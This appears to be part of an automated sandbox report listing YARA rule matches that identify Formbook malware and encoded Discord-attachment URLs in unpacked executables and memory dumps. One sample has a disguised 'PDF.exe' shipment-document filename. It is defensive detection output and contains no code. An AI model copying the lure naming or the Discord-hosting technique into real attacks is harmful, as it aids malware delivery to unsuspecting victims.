        Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 11.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 1.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 17.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 12.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 14.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 1.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 12.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 18.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 14.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000C.00000002.321929561.0000000000473000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000003.270904610.0000000003C8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.298456001.0000000000473000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000C.00000000.293835698.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000E.00000000.311802519.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000C.00000002.323136617.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.340669316.0000000000473000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000E.00000003.314083607.0000000002E64000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000012.00000000.339113202.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.301666823.0000000003B9C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000002.530165789.0000000003416000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000011.00000000.320572808.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000C.00000003.299620122.0000000002D34000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000001.00000000.260851932.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.299850141.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.342364275.0000000002540000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000B.00000000.289777084.0000000000471000.00000008.00020000.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
